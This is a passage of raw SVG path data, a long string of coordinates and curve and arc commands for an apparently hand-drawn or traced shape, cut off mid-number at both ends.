1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.